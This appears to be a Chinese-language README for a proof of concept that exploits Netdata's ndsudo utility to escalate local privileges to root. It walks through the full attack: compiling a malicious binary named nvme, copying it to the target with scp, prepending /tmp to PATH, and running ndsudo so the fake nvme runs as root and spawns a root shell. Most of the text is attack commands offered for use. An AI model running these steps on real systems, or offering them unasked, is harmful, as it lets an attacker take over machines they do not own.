ndsudo 实现权限提升(Netdata 本地利用)此PoC用于利用Netdata附带的易受攻击的ndsudo实用程序,将本地权限提升到root。该漏洞通过将恶意的二进制文件注入用户的PATH中,伪装成受信任的命令(nvme),然后由ndsudo以root权限执行。
您对目标系统具有本地shell访问权限。
您可以执行以下命令,但会失败并显示"未找到"或类似错误:
./ndsudo nvme-list
在您的攻击者机器(或具有编译器的易受攻击系统)上,编译该二进制文件(例如,来自仓库中的文件poc.c):
gcc poc.c -o nvme
该二进制文件应设计为生成一个root shell或以root权限执行任意命令。
将编译后的nvme二进制文件移动或上传到您的用户可写的目录,例如/tmp:
scp nvme user@target:/tmp/
# 或使用您拥有的任何文件上传方法
在目标系统上,确保二进制文件可执行,并将其目录添加到您的PATH前面:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
这样可确保ndsudo将解析并执行您恶意的nvme,而非合法的nvme。
ndsudo执行您的载荷运行易受攻击的命令以触发ndsudo:
./ndsudo nvme-list